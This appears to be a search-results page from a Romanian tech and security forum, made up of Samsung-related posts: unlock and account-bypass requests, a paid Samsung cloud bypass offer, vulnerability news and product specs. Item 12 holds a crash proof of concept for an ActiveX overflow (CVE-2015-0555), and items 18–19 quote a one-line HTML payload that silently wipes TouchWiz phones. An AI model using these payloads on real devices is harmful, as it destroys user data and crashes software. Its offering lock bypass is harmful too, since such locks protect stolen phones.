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Found 22 results

  1. Custom rom sau stock? Firmware schimbat? Overclock? Ce launchere/gadgets folositi? Un screenshot la ecran? Sau dati voi alte detalii intr-un reply. Incep eu. HTC ONE M8, custom rom de pe xda, fara oc, fara laucher de pe playstore (Love HTC UI), niciun gadget, ss n-are rost ca n-am nimic special facut pe ecran si cam atat.
  2. Salut. Ofer servicii bypass Samsung S-Cloud. Pret: 15 USD - Durata 10 minute PS: A NU SE CONFUNDA CU CONT GOOGLE!
  3. Salutare, ma poate ajuta cineva cu un cod pin pentru unlock la retea? Samsung S5 SM-G900F imei: 353687064164202 multumesc anticipat.
  4. Salutare, treaba-i simpla, de curand am achizitionat un telefon Samsung S5 caruia, desigur, i-am dat "Wipe data factory" din meniul "recovery", dupa ce am repornit telefonul mi-a cerut cont-ul samsung. Ei bine as dori sa ma ajutati daca aveti cunostintele necesare, sa fac bypass sau o alta metoda mai buna decat cea cu reinstalarea firmware-ului cu odin care mie nu mi-a functionat. Model: SM-G900F cu firmware: G900FXXU1BOC7
  5. Ai un astfel de telefon? Tocmai a fost descoperita o mare problema! Anuntul facut de Forbes Cei de la Samsung au declansat imediat o ancheta pentru a remedia problema! Cercetatorii de la firma de securitate, FireEye, au discutat la RSA Conference despre situatia securitatii biometrice pentru public. Acestia au descoperit dupa ce au facut o serie de teste pe Samsung Galaxy S5, dar si pe alte telefoane cu Android, ca sunt vulnerabile in fata hackerilor! Hackerii au oportunitatea de a accesa cu usurinta datele biometrice inainte ca acestea sa ajunga in 'zona sigura' si sa creeze copii pentru viitoare atacuri. In loc sa se concentreze pe spargerea zonei sigure, acolo unde sunt stocate informatiile biometrice, hackerii ar putea sa fure informatiile direct de pe scanerul de amprenta. Pentru a face asta, hackerii au nevoie doar de acces la nivelul userului obisnuit si sa ruleze un program prin root pentru a duplica informatiile. Cercetatorii de la FireEye spun ca pe Galaxy S5, malware-ul nu are nevoie decat de acces la sistem, nefiind necesar sa 'sape'. Yulong Zhang, reprezentatul FireEye, le-a spus celor de la Forbes: "Daca atacatorul poate sparge kernelul, desi nu poate accesa datele stocate cu ajutorul amprentei in zona sigura, poate citi direct senzorul de amprenta oricand. De fiecare data cand atingi senzorul de amprenta, atacatorul poate sa-ti fure amprenta. Poate lua datele si din date poti genera imaginea amprentei. Dupa aceea poti face orice vrei". Conform FireEye, vulnerabilitatea nu se gaseste in device-urile care vin cu Android 5.0 Lollipop sau mai nou, astfel ca ii incurajeaza pe utilizatori sa faca upgrade-ul cat mai rapid. Un reprezentat Samsung le-a spus celor de la Forbes: "Samsung ia securitatea datelor si intimitatea consumatorilor foarte in serios. Investigam in acest moment afirmatiile sustinute de FireEye". Desi cercetatorii sustin ca au testat un numar limitat de device-uri cu Android, ei se asteapta ca problema sa fie mai raspandita. SURSA : Ai un astfel de telefon? Tocmai a fost descoperita o mare problema! Anuntul facut de Forbes - www.yoda.ro
  6. CEO-ul BlackBerry a declarat, recent, ca producatorul canadian nu vrea sa faca exit de pe piata device-urilor, insa pana la o eventuala revenire pe profit a diviziei, compania va pune accent pe solutii de securitate dedicate segmentului enterprise si guvernamental. Blackberry a preluat, anul trecut, in iulie, compania Secusmart, implicit tehnologia de criptare cu acelasi nume, iar acum avem si o prima implementare a solutiei intr-un device. Vorbim despre o tableta bazata pe Samsung Galaxy Tab S 10.5 care a primit un tratament de securitate concentrat pe criptarea datelor si a comunicatiilor. Pe langa prezentarea generala a tabletei, eveniment care s-a desfasurat in prima zi a expozitiei de tehnologie CeBIT 2015 de la Hanovra (15 - 20 martie), reprezentantii Blackberry au anuntat si adoptarea tehnologiei de catre guvernele Canadei si Germaniei, semn ca producatorul mai are un cuvant de spus in acest domeniu. Dupa cum spuneam mai sus, SecuTABLET este, practic, un Samsung Galaxy Tab S 10.5 (despre specificatiile hadrware ale dispozitivului puteti citi AICI) ce ofera mai multe profiluri de lucru, precum personal si profesional, ambele fiind securizate impotriva accesului neautorizat. Potrivit The Wall Street Journal, SecuTABLET va costa 2380 de dolari. Ce sanse exista, insa, ca Blackberry sa revina cu un produs propriu pe piata tabletelor, dupa esecul PlayBook? CEO-ul companiei, John Chen, nu exclude posbilitatea reintrarii Blackberry pe acest segment, dar acest lucru se va intampla doar daca producatorul va reusi sa propuna conusmatorilor un de vice "iconic", diferit de orice exista in acest moment pe piata. Source
  7. Samsung a anun?at azi c? î?i extinde parteneriatul cu Microsoft ?i c? inten?ioneaz? ca o parte din serviciile ?i aplica?iile semnate Microsoft s? fie preinstalate pe noile device-uri cu Android ale companiei. Concomitent, Samsung va colabora cu Microsoft pe partea de dezvoltare a serviciului de securitate KNOX pentru noul Microsoft Office 365. Un alt beneficiu, se refer? la faptul c? cei care de?in un model Samsung Galaxy S6 ori Samsung Galaxy S6 edge vor primi 100 GB de spa?iu de stocare în cloud, pe Microsoft OneDrive, gratuit, timp de doi ani. Iar cei care vor cump?ra un device Samsung prin canalele de vânzare business-to-business vor primi acces la trei versiuni de Office 365 – Business, Business Premium ?i Enterprise, la care se adaug? solu?ia de securitate KNOX. Colaborarea dintre cele dou? companii a f?cut un pas înainte cu prilejul târgului Mobile World Congress, când Samsung a anun?at c? noile smartphone-uri Samsung Galaxy S6 ?i Galaxy S6 edge vor include aplica?iile OneNote, OneDrive ?i Skype. Mai mult, compania a f?cut cunoscut c? în prima jum?tate a anului, programele Microsoft Word, Excel, PowerPoint, OneNote, OneDrive ?i Skype urmeaz? s? fie preinstalate pe o serie de tablete cu Android. Source
  8. Ce program pentru un smart tv 3d philips exista ? Gen cum este allshare de la samsung !?
  9. A whole lot of things gone in the official kickoff of Mobile World Congress 2015, but a unique phone with a curved screen on both sides of the device acquired everybody’s attention. That’s what unveiled by Samsung late Sunday. Samsung has officially unveiled its next-generation flagship Smartphones — Samsung Galaxy S6 and Samsung Galaxy S6 Edge. This time, the company didn’t just focus on the specs and features, but also on design — unique and sleek. 1. EYE-CATCHING PREMIUM DESIGN Both Samsung Galaxy S6 and Samsung Galaxy S6 Edge comes with a sleek glass-and-metal body on the front and back. On one hand, the Samsung Galaxy S6 Edge has a screen that curves around both sides with a comfortable grip, giving the phone a much smarter look. While, the Samsung Galaxy S6 has the most beautiful appearence to ever exist in the entire Samsung's S series. The new Galaxy smartphones are made of 'stronger metal' and comes with the toughest glass, Corning Gorilla Glass 4 protection, which makes it harder to bend. The Gorilla Glass 4 rear panel of the new Samsung Galaxy S6 smartphones comes in attractive colors such as Topaz Blue and White Pearl, which changes appearance based on how much light is reflected off of the glass. Both Samsung new Galaxy smartphones are lightweight — Samsung Galaxy S6 is 6.8 mm thin and weighs 138g, while the Samsung Galaxy Edge is 7.0mm and weighs 132g. The new Galaxy smartphones' design looks and feels pretty sweet and attractive. 2. SUPER AND WIRELESS CHARGING The brand new Samsung Galaxy S6 and Galaxy S6 Edge support WPC and PMA wireless charging, so you can now charge the smartphones wirelessly. The new wireless charging technology adopted by both the smartphones set a new industry standard for universal wireless charging. The Samsung Galaxy S6 has a 2,550mAh battery, while the Samsung Galaxy S6 Edge has a 2,600mAh battery. The battery for both smartphones lasts for up to 12 hours on Wi-Fi and, Samsung claims that they supports incredibly fast wired charging, "faster than any other smartphone in the industry." Samsung claims you'll be able to get four hours of battery life with just 10 minutes of charging the Samsung Galaxy S6. To get to 100%, the new Galaxy smartphones takes roughly half the time of the iPhone 6 to charge. 3. STANDARD DISPLAY The Samsung Galaxy S6 Edge is the first smartphone to feature curved display on both sides, which creates a more eye-catching display than we've seen on any other Galaxy S series. Both Samsung Galaxy S6 and Galaxy S6 Edge are strikingly similar with the same 5.1 Quad HD Super AMOLOED display and 2,560 x 1,440 resolution, which offers a very high pixel density of 577ppi. Only the difference is that Samsung Galaxy S6 Edge sports a 5.1 Quad HD Super AMOLED but with dual edge display. 4. SMARTER AND SPEEDIER CAMERA The camera is the another real standout feature the new Samsung Galaxy S6 smartphones have. Both the smartphones come with a 16MP OIS rear camera and a 5MP front camera, same as the Galaxy S5, but added Optical Image Stabilisation (OIS) for low-light shots and Auto Real-Time HDR for fast and easy color balance. The company says the camera will now launch almost immediately in 0.7 seconds just by tapping the home button twice on the front of either phone. Both the back and front-facing cameras offer a high dynamic range (HDR) mode that improves the contrast and low-light performance. At the launch, Samsung displayed low-light photos taken by the iPhone 6 Plus and the brand new Galaxy S6 side by side on the large screen. The latter won both for photos and video. In a video demo, a couple sitting in front of a fountain at night almost looked like silhouettes on the iPhone 6 video, but were clearly illuminated in the new Samsung Galaxy S6 video. Camera features include: Quick Launch, Tracking AF, Auto Real-time HDR(Front & Rear) , F1.9, Low Light Video(Front & Rear), High Clear Zoom, IR Detect White Balance, Virtual Shot, Slow Motion, Fast Motion, Pro Mode, Selective Focus. 5. SAMSUNG PAY The Samsung Galaxy S6 and Galaxy S6 Edge are the first in series of Samsung smartphones to offer mobile-payments system. Samsung Pay, a new, easy-to-use mobile payment service, will launch on Galaxy S6 and Galaxy S6 Edge in the United States during the second half of this year. Protected by Samsung KNOX, fingerprint scanning, and advanced tokenization, Samsung Pay allows both Near Field Communication (NFC) and a new proprietary technology called Magnetic Secure Transmission (MST) payments. This means Samsung Pay will work with potentially many more machines than Apple Pay. 6. FINGERPRINT SENSOR Like Apple’s fingerprint scanner TouchID, Samsung now offers fingerprint scanner in its new flagship phone, the Samsung Galaxy S6. However, the Galaxy S6 improves more on the feature by replacing the "sliding" of your fingerprint across the button, by just pressing your finger on the screen. Just you need to do is place your finger on the sensor embedded in the Samsung Galaxy S6's home button and the phone will unlock without the need of any passcode. You can store up to four fingerprints on the device. As we mentioned above, the Samsung Galaxy S 6's fingerprint sensor will also be a key part of Samsung Pay, Samsung's mobile payments platform that will launch in the United States during the second half of this year. 7. OTHER NEW FEATURES The Samsung Galaxy S6 and Galaxy S6 Edge are powered by Exynos 7 Octa-core processor which contain two quad-core processor clocked at 2.1 GHz and 1.5GHz respectively. Both Galaxy smartphones run on Android 5.0 "Lollipop" OS with some Samsung customizations On the memory front, both S6 and S6 Edge comes with 3GB LPDDR4 RAM and will be available in 32GB, 64GB and 128GB internal storage variants with support for Universal Flash Storage 2.0. On the connectivity front, the devices offer WiFi: 802.11 a/b/g/n/ac (2.4/5GHz), HT80 MIMO(2×2) 620Mbps, Dual-band, Wi-Fi Direct, Mobile hotspot, Bluetooth v4.1, A2DP, LE, apt-X, ANT+, USB 2.0, NFC and IR Remote. On the security front, both the devices are built on the upgraded Samsung KNOX, end-to-end secure mobile platform, offering defense-grade features for real-time protection from potential malicious attacks. Both the smartphones use the 14 nanometer mobile processor with a 64-bit platform. 8. SAMSUNG GALAXY S6 Vs. SAMSUNG GALAXY S5 Samsung Galaxy S5 came with a 2.5-GHz quad-core processor, whereas Samsung Galaxy S6 sports two processors — one quad-core 2.1-GHz and one quad-core 1.5-GHz, which will allow it to handle more applications with greater precision. Samsung Galaxy S5 came with 2GB RAM, 32 or 64GB storage, and Android 4.4.2 KitKat built-in. While Samsung Galaxy S6 offers 3GB RAM and storage options of 32, 64, or 128GB and comes with Android 5.0 Lollipop. Samsung Galaxy S5 screen is 5.1 inches and offered full 1920 x 1080-oixel resolution, for a pixel density of 432 ppi. While Samsung Galaxy S6 goes beyond the standard HD at 2560 x 1440-pixel resolution on a 5.1-inch screen, giving it a pixel density of 577 ppi. One restriction in the Samsung Galaxy S6 is that it doesn’t provide a microSD slot, meaning that you’ll have to pay up-front for expensive onboard storage, and whatever you buy, you’re stuck with. Whereas, Samsung Galaxy S5 doesn't have such restriction. Both Samsung Galaxy S5 and Galaxy S6 feature 16-megapixel rear cameras, but the Galaxy S6 offers a 5-megapixel front camera with more software improvements. Compare that to the 2-megapixel front-facing camera on the S5. Samsung Galaxy S6 added a number of Samsung-specific features, including S Health 4.0 and Samsung Pay, which were not included in Samsung Galaxy S5. The Samsung Galaxy S6 and the Samsung Galaxy S6 Edge will be available globally starting from April 10, 2015 and will be available in White Pearl, Black Sapphire, Gold Platinum, Blue Topaz (Galaxy S6 only) and Green Emerald (Galaxy S6 Edge only). -> Sursa: Samsung Galaxy S6 and Galaxy S6 Edge — 8 Things You Should Know - Hacker News
  10. eXs

    samsung s4

    Un room pentru samsung s4 GTI9515.. la 20 de min mi se restarteaza telefonul..daca il schimb oare mai face asa ?
  11. Salut baieti. Am si eu un samsung care este blocat pe orange si as dori sa il decodez. Din pacate ma pricep mai mult la calculatoare decat la telefoane ,asa ca daca cineva de aici m-ar putea ajuta cu o decodare sau cu un software as aprecia. Multumesc frumos
  12. <!-- # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555) # Date: 22/02/2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx # Version: Samsung iPOLiS 1.12.2 # Tested on: Windows 7 Ultimate N SP1 # CVE: 2015-0555 --> <html> <!-- Vulnerability found and PoC coded by Praveen Darshanam http://blog.disects.com CVE-2015-0555 targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" Operating System = Windows 7 Ultimate N SP1 Vulnerable Software = Samsung iPOLiS 1.12.2 CERT tried to coordinate but there wasn't any response from Samsung --> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var arg1 = ""; var arg2="praveend"; for (i=0; i<= 15000; i++) { arg1 += "A"; } target.WriteConfigValue(arg1 ,arg2); </script> </html> <!-- #############Stack Trace#################### Exception Code: ACCESS_VIOLATION Disasm: 149434 MOV AL,[ESI+EDX] Seh Chain: -------------------------------------------------- 1 647C7D7D mfc100.dll 2 647D0937 mfc100.dll 3 64E242CA VBSCRIPT.dll 4 77B3E0ED ntdll.dll Called From Returns To -------------------------------------------------- XNSSDKDEVICE.149434 41414141 41414141 414141 414141 3DA4C4 3DA4C4 mfc100.647790C1 mfc100.647790C1 56746C75 Registers: -------------------------------------------------- EIP 00149434 EAX 00003841 EBX 00609FB0 -> 0015A564 ECX 00003814 EDX 00414141 EDI 0000008F ESI 0000008F EBP 002BE5FC -> Asc: AAAAAAAAAAA ESP 002BE564 -> 0000000C Block Disassembly: -------------------------------------------------- 149423 XOR EDI,EDI 149425 XOR ESI,ESI 149427 MOV [EBP-8C],ECX 14942D TEST ECX,ECX 14942F JLE SHORT 00149496 149431 MOV EDX,[EBP+8] 149434 MOV AL,[ESI+EDX] <--- CRASH 149437 CMP AL,2F 149439 JNZ SHORT 00149489 14943B MOV ECX,EBX 14943D TEST ESI,ESI 14943F JNZ SHORT 0014944D 149441 PUSH 159F28 149446 CALL 0014F7C0 14944B JMP SHORT 00149476 ArgDump: -------------------------------------------------- EBP+8 00414141 EBP+12 003DA4C4 -> Asc: defaultV EBP+16 647790C1 -> EBE84589 EBP+20 FFFFFFFE EBP+24 646CBE5C -> CCCCCCC3 EBP+28 0000001C Stack Dump: -------------------------------------------------- 2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................] 2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] --> Source
  13. buna seara! Am un telefon samsung si cand il pornesc cu o cartela in el imi cere master lock ..ce pot sa fac ?
  14. Salut, am un Samsung GT-N7000, am incercat sa instalez alt android, toate bune pana cand am flashuit telefonu, am intrat in system recovery am incercat sa instalez un android si dupa un restart numai pot intra in System Recovery, am intrat in modu de download insa pc-ul nu il recunoaste, ce pot face ?¿
  15. Researchers have reportedly found a vulnerability in a security system embedded in Samsung's Galaxy S4 smartphone that could allow an attacker to steal data. Security researchers at Ben-Gurion University of the Negev in Israel uncovered vulnerabilities in Samsung's KNOX security solution. The findings were first reported by the Wall Street Journal, which noted that KNOX is currently being reviewed by the U.S. Department of Defense and other government agencies for potential use. Aimed at Google Android devices, KNOX includes the ability to enforce the separation of information through containerization as well as a secure boot and kernel monitoring capabilities. According to researchers at BGU's Cyber Security Labs, the issue makes interception of data communications between the secure container and the external world – including file transfers and emails – relatively easy. "To us, Knox symbolizes state-of-the-art in terms of secure mobile architectures and I was surprised to find that such a big 'hole' exists and was left untouched," Ph.D. student Mordechai Guri said in a statement. "The Knox has been widely adopted by many organizations and government agencies and this weakness has to be addressed immediately before it falls into the wrong hands. We are also contacting Samsung in order to provide them with the full technical details of the breach so it can be fixed immediately." Guri, who is part of a team of BGU researchers that focus on mobile security and other cyber-issues, uncovered the vulnerability while performing an unrelated research task. According to BGU, KNOX's secure container is supposed to ensure that all data and communications that take place within the secure container are protected. Even a malicious application should attack an area outside the secure container all the protected data should be inaccessible under all circumstances. However, researchers found that that is not the case. "To solve this weakness, Samsung may need to recall their devices or at least publish an over the air software fix immediately," said Dudu Mimran, chief technology officer of the BGU labs, in the statement. "The weakness found may require Samsung to re-think a few aspects of their secure architecture in future models." Samsung did not respond to a request for comment from SecurityWeek. However, the company told the Wall Street Journal that it was investigating the matter, and that preliminary investigation has found that the researchers' work seems to be based on a device that was not equipped with features that a corporate client would use alongside Knox. "Rest assured, the core Knox architecture cannot be compromised or infiltrated by such malware," the Samsung spokesperson told the Wall Street Journal. Source: Samsung KNOX Security Software Embedded in Galaxy S4 Vulnerable, Researchers Say | SecurityWeek.Com
  16. Salut rst.Acum 8 luni,am instalat un rom nou pe samsungul meu.Stiu ca intotdeauna cautam un rom mai bun,cu mai multe chestii noi,da setea asta m a facut sa i dau capatu...Am instalat(sau incercat) sa instalez AOKP jellybean,in speranta ca o sa mearga mai misto decat cyanogen(ce bou is:)) ).Problema este,ca in timpul instalarii s a stins tot(da, mai aveam curent in telefon) iar cand am pornit telefonu',imi statea intr un bootloop iar nimic nu mai mergea.am incercat sa intru in recovery(middle button +power button+alea 2 de volum) da nu mai era nimic.tot intra in bootloop.vreau sa precizez ca download mode inca mai merge,da nu stiu daca o sa ma ajute cu adevarat.Stiti cumva daca telefonul s a prajit de tot,sau mai poate fi sculat din morti?L as duce la un service,dar sunt blocat la bunicii mei in sat si nimeni nu are cunostinte de telefoane/calculatoare:)). ps.am incercat odin,(din fericire programu mi vede telefonu da nu stiu ce sa bag acolo ca sa l scot din cacat,) samsung kies si one click unbrick. Draethr:D:*
  17. Salut am un telefon samsung SGH-D600E codat pe Orange Network,este vre'o modalitate sa il decodez fara sa platesc (nu merita sa dau bani pe decodare,e destul de vechi telefonu cu cat dau pe decodare iau altu).Un cod ceva ce nu necesita cablu de date!?
  18. La o conferin?? de securitate a fost? demonstrat? o metod? cu ajutorul c?reia, folosind doar o singur? linie de cod HTML, pot fi executate comenzi de la distan?? pentru smartphone-urile Samung ce folosesc TouchWiz. De exemplu, pentru a efectua o resetare la configur?rile din fabric?, e suficient? vizualizarea unei pagini ce con?ine urm?torul cod HTML: <iframe src="tel:*2767*3855#" /> De men?ionat, c? acest exploit poate fi executat ?i printr-un cod QR sau tehnologia NFC. Mai multe detalii: One line of HTML can wipe or reset Samsung smartphones
  19. Samsung TouchWiz are o vulnerabilitate ce poate sterge toate datele de pe telefon Acum cateva ore a aparut o informatie pe internet ce priveste interfata folosita de smartphone-urile Samsung peste Android, TouchWiz. Este vorba despre o vulnerabilitate de tip USSD care se poate regasi intr-un link HTML, odata accesat acel link de pe un smartphone ce foloseste interfata TouchWiz, adica multe telefoane de la Samsung cu android, acesta va initia un wipe al telefonului cauzand pierderea tuturor datelor de pe telefonul dumneavoastra. [...] Din ce s-a testat pana acum Samsung Galaxy S II si III (varianta AT&T) sunt vulnerabile in fata acestui cod malitios. Nu va recomand sa incercati insa cu alt model de Samsung pentru ca e foarte posibil sa va treziti cu telefonul sters. Pau Oliva este cel care a adus in atentia tuturor aceasta vulnerabilitate si se pare ca e vorba de un automatism in introducerea codului de wipe (factory data reset) in aplicatia de telefon de unde putem de obicei executa astfel de comenzi asupra telefonului. Un link accesat in forma: “< frame src="tel:*2767*3855%23" />” poate executa automat comanda de wipe fara sa mai intrebe utilizatorul daca doreste acest lucru, astfel controlul acestuia asupra device-ului fiind ca si inexistent. Repet, aveti grija pe ce faceti click de pe telefonul vostru android pana la noi patch-uri de la Samsung. Sursa: http://life4gadgets.com/2012/09/25/samsung-touchwiz-are-o-vulnerabiltate-ce-poate-sterge-toate-datele-de-pe-telefon/ My opinion: Inca nu am experimentat "defectul" si sper sa si nu. Aviz amatorilor si idee competitorilor P.S. Am editat textul oficial din cauza unor mici greseli gramaticale plus o mica fraza neimportanta.
  20. Samsung a dat lovitura cu telefonul-tableta Galaxy Note, inregistrand un numar de 7 milioane de unitati vandute. Mai multe site-uri au anuntat ca Samsung va lansa un nou model Galaxy Note 2, in aceasta toamna. Galaxy Note 2 va avea probabil un procesor quad-core Exynos , o camera de 12 megapixeli si o baterie cu o autonomie mult mai mare.Ecranul ar putea avea o dimensiune mai mare de 5,5 inci, avand o rezolutie de 1680 x 1050 pixeli si ar putea sa fie flexibil cu ajutorul tehnologiei UBP (unbreakable plane). Galaxy Note 2 ar putea avea instalata o noua versiune a sistemului de operare Android: 4.1 Jelly Beam. Modelul este asteptat sa fie lansat in luna octombrie a acestui an. Samsung va lansa display-ul flexibil indestructibil anul acesta Sursa : Samsung Galaxy Note 2 va avea un ecran flexibil
  21. Un Samsung Galaxy S III a luat foc din senin in timp ce se incarca in masina, spune un utilizator din Irlanda. “Putea sa ia foc in timp ce vorbeam la telefon si sa imi arda fata sau sa imi ia foc in buzunar si sa ma ard la picior” spune irlandezul. Cei de la Samsung au inceput o ancheta pentru a vedea din ce cauza a luat foc telefonul.Dupa cum vedeti in imagini smartphone-ul a luat foc la baza unitati in aproprierea portului de incarcare. Samsung a vandut deja 10 milioane de modele in intreaga lume si este unul dintre cele mai vandute telefoane din toate timpurile. Aceste imagini au fost postate pe un site de catre un utilizator din Dublin, Irlanda.In poze se vede clar ca plasticul este topit in jurul terminalului de incarcare. Cei de la Samsung au anuntat ca vor face investigatii , pentru a vedea daca modelele sunt sensibile la supraincalzire.Un purtator de cuvant de la Samsung a spus ca : “Samsung este constienta de aceasta problema si va incepe investigatiile imediat dupa ce primesc modelul care a ars.Odata ce ancheta va fi terminata, vom fi in masura sa va oferim detalii suplimentarea cu privire la aceasta situatie” scrie DailyMail Sursa : Un Galaxy S III a luat foc din senin in masina unui utilizator
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